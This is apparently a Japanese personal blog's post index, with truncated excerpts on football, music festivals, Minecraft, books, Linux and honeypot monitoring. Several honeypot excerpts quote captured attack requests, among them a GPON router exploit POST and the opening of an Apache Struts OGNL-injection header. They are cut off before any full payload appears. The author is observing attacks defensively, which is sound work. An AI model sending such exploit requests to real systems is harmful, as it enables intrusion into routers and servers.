今からフジロックに行ってきます! 毎年行ってるのですが、今年は ケンドリック・ラマー スクリレックス チャーチズ あたりが楽しみですが、出来るだけ多くのアーティストを見たいと思います。 台風が来てますが、雨対策はバッチリなので、あまり気にしてな…
暑さのせいかW杯で睡眠時間が不規則になっているせいか、休日は昼過ぎまで寝てしまうことが多く、起きてからも何もやる気が起きないことが多いです。 (でも、W杯あるときはかなりワクワクして過ごしているので、精神的には健康だと思っています。笑) ただ…
悔しいという言葉では表せないくらい、日本対ベルギー戦は白熱した試合でした。 そんな試合を海外メディアはどう報道しているのかまとめたいと思います。 Agencia EFE www.efe.com 3-2. Nacer Chadli aferra a Bélgica al Mundial (3-2. ナセル・シャドリ …
昨日行われたポーランド戦はなんとも言えない試合でしたねー。 日本は大幅にメンバーを変え、前半はポーランドを押していた印象でしたが、後半にセットプレーから得点を決められてしまい、その後は裏で行われているコロンビアvsセネガルの試合の様子を伺い、…
遅くなりましたが、一昨日のセネガル戦について書きます。 引き分けに終わってしまいましたが、個人的には勝たなければいけない試合だったと感じています。 失点に関しても、1点目は複数のミスが重なって失点してしまいましたし、シュートに関しても2点くら…
昨日のコロンビア戦で日本代表が勝利して、勝ち点3を取ってとても嬉しいです。 代表選手達も最後まで気を抜かず、引き締まっていた試合だったかなと思います。 今日以降、日本のメディアでは様々な評価がされると思いますが、世界のメディアでは日本対コロン…
何気なくGlastopfのログを見ていると、いつもとは違った変なアクセスがありました。 同じ時刻に同じIPアドレスから6件アクセスが来ているので、何らかのスクリプトで脆弱性がないか探索しているものと推測できます。 アクセス① POST /wuwu11.php HTTP/1.1 Co…
先日紀州のドン・ファンの野崎幸助が亡くなって、ファンの一人としてとても悲しいのですが、事件性があるので、この記事ではそれをウォッチしていきたいと思います。 情報源は主にネットニュースです。 随時新しい情報が入れば、更新していきます。 2018/5/2…
最近マインクラフトにハマりすぎていて、読書する時間、ブログ書く時間、勉強する時間、プログラミングする時間など僕が生産的と思っている時間が少なくなっているので、ゲームと仕事や勉強などの違いを知りたくて、『残酷すぎる成功法則』を読みました。 残…
しばらくCowrieを放置していたのですが、かなりアクセスが来ているようで、実際にダウンロードされたファイルもたくさんあったので、どんなファイルがダウンロードされていたかご紹介したいと思います。 Cowrieの場合、攻撃者がSSHでログインして何かしらの…
日々、ハニーポットを運用していて様々な製品の脆弱性を狙った攻撃を観察していますが、その脆弱性を評価するCVSS(共通脆弱性評価システム )について疎かったので、今日はそのCVSSについてご紹介したいと思います。 CVSSとは そもそもCVSSとは何なのでしょ…
Mikto Til社のRouterOSを探索するようなアクセスをキャッチしたので、ご紹介します。 今回キャッチしたアクセスログはこんな感じです。 GET /webfig/roteros.info HTTP/1.1 Accept: */* Connection: close Host: XXX.XXX.XXX.XXX User-Agent: Wget(linux) 単…
マインクラフトをやっていると、やっぱりどうしてもダイヤ大量にほしーってなります。 ブランチマイニングというものをヒカキンさんの動画で知ったのですが、オーソドックスなツリー状ブランチマイニングに飽きてきたので、風車方式ブランチマイニングを使用…
昨日SSHハニーポットのCowrieをインストールしたのですが、1日でどれくらい攻撃がきているか確認してみました。 saito.hatenadiary.com その数、なんと。。。 483件! 多すぎでしょ。笑 日々SSHの攻撃は来ているのは分かっていましたが、1日で483件も来てい…
以前から気づいていたのですが、僕のハニーポットのauth.logにものすごい量のSSH認証失敗ログが記録されています。 インターネットの世界はHTTPだけでなく、SSHアタックも多いことと、最近Glastopfの攻撃アクセスが偏っていて、面白くなくなってきたので、SS…
Atomを使用したくてインストールしたのですが、Proxy環境でパッケージをインストール使用とすると下記エラーメッセージが出力され、パッケージをインストールすることができません。 Searching for “japanese” failed.Hide output… tunneling socket could n…
普段MacBook Proを使用しているのですが、これまでマウスなしで利用していました。 いろいろPCを操作してく上で、やっぱりマウスないと不便なので、良いマウスないかなーと思って調べてみると、やっぱり『Magic Mouse 2』の評価が高かったので、購入しました…
最近DASAN Network Solutionsのホームルーターの脆弱性やWebLogicの脆弱性を狙った攻撃ばかりで、つまんないなーと思いながらハニーポットのログを見ていたら、見慣れないログを見かけたので、ご紹介します。 そのログはこんな感じのログです。 POST /RPC2 H…
Linuxカーネスソースを読む環境は準備できたのですが、どこから手をつけたら良いか分からないので、カーネルの動きを確認できるSystemTapという機能を使用して、遊んでみようと思いました。 まずはLinuxカーネルのタスクスケジューラ機能がどのようにタスク…
前回の続きです。 saito.hatenadiary.com 今回はカーネル・ソースを実際に読めるようなところまでの手順をご紹介したいと思います。 SRPMファイルのダウンロード 普通状態であれば、OSにはソースコードは付いてこないので、SRPMファイルというファイルをダウ…
Linuxのカーネル・ソースを読みたくて、その環境をどこかで構築したいと思っていたのですが、AWSだと料金がかかるので、Vagrantを使ってサクッと環境構築してみました。 Vagrantは以前から利用しているのですが、しばらく使用しないでいるとコマンドを忘れて…
機会学習の勉強会やブログなどで、よく紹介されている『はじめてのパターン認識』を読んでみたのですが、僕には3000年くらい早かったらしく挫折したので、どんなところでつまずいたのか備忘のため、残しておきたいと思います。 はじめてのパターン認識作者: …
ハニーポットを運用していて、万が一僕のハニーポットがウイルスに感染したらどうしようと気になってはいました。 なので、ウイルス対策ソフトをインストールしたいと思っていたのですが、どうしても市販のものだと初期費用がかかるし、更新費用とかも気にな…
先日、双日の決算発表がありましたので、総評を述べたいと思います。 当初の計画と実績の比較 僕が双日株を購入したのは、2018年1月でその時点での株価は356円でした。 その時点での四季報による営業利益の推移予想はこんな感じでした。 年月 営業収益 営業…
毎日ハニーポットのログを見るのが、日課になっています。 ただ、今はログを見る際パソコンを広げて、見るというスタイルで、いつでもどこでも見ることができるというわけではないので、いつでもどこでもハニーポットのログが確認できるようにAmazon CloudWa…
ゴールデンウィークに仙台に行ってから、すっかり伊達政宗のファンになったので、司馬遼太郎さんの『馬上少年過ぐ』を読みました。 馬上少年過ぐ (新潮文庫)作者: 司馬遼太郎出版社/メーカー: 新潮社発売日: 1978/11/29メディア: 文庫 クリック: 3回この商品…
5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。 具体的なアクセスは下記のようなものです。 POST /GponForm/diag_Form?images/ HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 119 Content-Type: text/pla…
ヒカキンさんのマインクラフトの動画を見ていて、とても楽しそうだったので、前にダウンロードしておいたiPhoneのマインクラフトアプリをダウンロードしていて、放置していたのを思い出して、やってみることにしました。 www.youtube.com MinecraftMojangゲ…
もうゴールディンウィークも残り1日となってしまいました。 僕は別に仕事は嫌いじゃないので、あまりサザエさん症候群にならない方なのですが、今回のゴールデンウィークは、祝日が重なり休日がだいぶ長かったので、さすがに月曜が憂鬱です。 サザエさん症候…
Glastopfのログを見ていて、なんじゃこれってなったログがあったので、ご紹介します。 GET /index.action HTTP/1.1 Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAc…
